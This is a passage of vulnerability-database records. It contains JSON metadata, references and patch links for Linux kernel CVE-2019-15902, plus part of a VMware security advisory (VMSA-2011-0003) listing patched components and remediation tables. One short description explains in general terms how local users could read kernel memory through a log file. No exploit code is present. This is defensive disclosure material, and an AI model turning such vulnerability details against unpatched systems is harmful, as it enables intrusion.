        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-15902",
        "trust": 3.3
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "154606",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3691",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4261",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3570",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3817",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3613",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0644",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-147995",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15902",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154948",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154897",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154934",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154946",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154933",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154935",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "154606"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "id": "VAR-201909-1049",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      }
    ],
    "trust": 0.35113123999999996
  },
  "last_update_date": "2023-12-18T11:24:27.585000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=97941"
      },
      {
        "title": "Red Hat: CVE-2019-15902",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2019-15902"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2019-1281",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1281"
      },
      {
        "title": "Debian Security Advisories: DSA-4531-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=426a377014db3361a5918ec383935e10"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe, linux-azure, linux-gcp, linux-gke-5.0 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4157-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure, linux-gcp, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4157-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4162-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4163-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4163-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-azure vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4162-2"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-119",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://grsecurity.net/teardown_of_a_failed_linux_lts_spectre_fix.php"
      },
      {
        "trust": 2.4,
        "url": "https://www.debian.org/security/2019/dsa-4531"
      },
      {
        "trust": 2.4,
        "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15902"
      },
      {
        "trust": 1.9,
        "url": "https://usn.ubuntu.com/4157-2/"
      },
      {
        "trust": 1.8,
        "url": "https://seclists.org/bugtraq/2019/sep/41"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20191004-0001/"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4157-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4162-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4162-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4163-1/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4163-2/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15902"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914218-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192424-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192414-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192412-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192648-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3570/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3691/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/154606/debian-security-advisory-4531-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-linux-kernel-affect-ibm-spectrum-protect-plus/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4261/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0644/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-information-disclosure-via-spectre-backport-30402"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3613/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3817/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4162-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15918"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4157-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15504"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16714"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4163-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15902"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4162-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1020.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-32.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1024.25"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1048.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1052.54~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1047.50"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-66.75"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1059.68"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1061.66"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1046.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1049.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1066.73"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-66.75~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1052.54"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4163-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-32.34~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4157-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1023.23~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-166.195"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1128.136"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1124.133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1060.67"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1096.107"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "154606"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "154606"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "date": "2019-09-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "date": "2019-09-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "date": "2019-10-23T18:28:53",
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "date": "2019-09-25T18:06:37",
        "db": "PACKETSTORM",
        "id": "154606"
      },
      {
        "date": "2019-10-17T15:18:45",
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "date": "2019-10-22T17:26:43",
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "date": "2019-10-23T18:28:39",
        "db": "PACKETSTORM",
        "id": "154946"
      },
      {
        "date": "2019-10-22T17:26:37",
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "date": "2019-10-22T17:26:50",
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "date": "2019-09-04T06:15:10.780000",
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "date": "2019-09-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "date": "2019-09-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "date": "2019-10-17T04:15:12.203000",
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "date": "2020-02-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154934"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "154935"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Buffer error vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ],
    "trust": 0.6
  }
}

var-201001-0692
Vulnerability from variot

The print_fatal_signal function in kernel/signal.c in the Linux kernel before 2.6.32.4 on the i386 platform, when print-fatal-signals is enabled, allows local users to discover the contents of arbitrary memory locations by jumping to an address and then reading a log file, and might allow local users to cause a denial of service (system slowdown or crash) by jumping to an address. (DoS) There is a possibility of being put into a state. The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. Denial-of-service attacks are also possible. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2011-0003 Synopsis: Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX Issue date: 2011-02-10 Updated on: 2011-02-10 (initial release of advisory) CVE numbers: --- Apache Tomcat --- CVE-2009-2693 CVE-2009-2901 CVE-2009-2902 CVE-2009-3548 CVE-2010-2227 CVE-2010-1157 --- Apache Tomcat Manager --- CVE-2010-2928 --- cURL --- CVE-2010-0734 --- COS Kernel --- CVE-2010-1084 CVE-2010-2066 CVE-2010-2070 CVE-2010-2226 CVE-2010-2248 CVE-2010-2521 CVE-2010-2524 CVE-2010-0008 CVE-2010-0415 CVE-2010-0437 CVE-2009-4308 CVE-2010-0003 CVE-2010-0007 CVE-2010-0307 CVE-2010-1086 CVE-2010-0410 CVE-2010-0730 CVE-2010-1085 CVE-2010-0291 CVE-2010-0622 CVE-2010-1087 CVE-2010-1173 CVE-2010-1437 CVE-2010-1088 CVE-2010-1187 CVE-2010-1436 CVE-2010-1641 CVE-2010-3081 --- Microsoft SQL Express --- CVE-2008-5416 CVE-2008-0085 CVE-2008-0086 CVE-2008-0107 CVE-2008-0106 --- OpenSSL --- CVE-2010-0740 CVE-2010-0433 CVE-2010-3864 CVE-2010-2939 --- Oracle (Sun) JRE --- CVE-2009-3555 CVE-2010-0082 CVE-2010-0084 CVE-2010-0085 CVE-2010-0087 CVE-2010-0088 CVE-2010-0089 CVE-2010-0090 CVE-2010-0091 CVE-2010-0092 CVE-2010-0093 CVE-2010-0094 CVE-2010-0095 CVE-2010-0837 CVE-2010-0838 CVE-2010-0839 CVE-2010-0840 CVE-2010-0841 CVE-2010-0842 CVE-2010-0843 CVE-2010-0844 CVE-2010-0845 CVE-2010-0846 CVE-2010-0847 CVE-2010-0848 CVE-2010-0849 CVE-2010-0850 CVE-2010-0886 CVE-2010-3556 CVE-2010-3566 CVE-2010-3567 CVE-2010-3550 CVE-2010-3561 CVE-2010-3573 CVE-2010-3565 CVE-2010-3568 CVE-2010-3569 CVE-2010-1321 CVE-2010-3548 CVE-2010-3551 CVE-2010-3562 CVE-2010-3571 CVE-2010-3554 CVE-2010-3559 CVE-2010-3572 CVE-2010-3553 CVE-2010-3549 CVE-2010-3557 CVE-2010-3541 CVE-2010-3574 --- pam_krb5 --- CVE-2008-3825 CVE-2009-1384


  1. Summary

Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.

  1. Relevant releases

vCenter Server 4.1 without Update 1,

vCenter Update Manager 4.1 without Update 1,

ESXi 4.1 without patch ESXi410-201101201-SG,

ESX 4.1 without patch ESX410-201101201-SG.

  1. Problem Description

a. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3

Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.

Customers using other database solutions need not update for
these issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • Hosted products are VMware Workstation, Player, ACE, Fusion.

b. vCenter Apache Tomcat Management Application Credential Disclosure

The Apache Tomcat Manager application configuration file contains
logon credentials that can be read by unprivileged local users.

The issue is resolved by removing the Manager application in
vCenter 4.1 Update 1.

If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon
credentials are not present in the configuration file after the
update.

VMware would like to thank Claudio Criscione of Secure Networking
for reporting this issue to us.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-2928 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not affected
VirtualCenter  2.5       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21

Oracle (Sun) JRE update to version 1.6.0_21, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,
CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,
CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,
CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,
CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,
CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,
CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,
CVE-2010-0850.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following name to the security issue fixed in
Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not applicable **
VirtualCenter  2.5       Windows  not applicable **

Update Manager 4.1       Windows  not applicable **
Update Manager 4.0       Windows  not applicable **
Update Manager 1.0       Windows  not applicable **


hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
